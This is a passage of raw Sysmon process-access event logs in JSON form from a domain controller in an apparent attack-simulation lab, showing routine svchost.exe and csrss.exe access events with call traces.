07:55:27.873","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FEF-5F25-0000-00106A3A0500}","TargetProcessId":"3268","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2944,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2945,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2946,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2947,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2948,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2949,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2950,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2951,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTE